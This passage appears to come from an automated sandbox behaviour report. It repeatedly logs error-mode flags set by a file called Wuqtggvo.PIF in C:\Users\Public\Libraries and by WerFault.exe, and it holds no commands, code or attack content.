                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
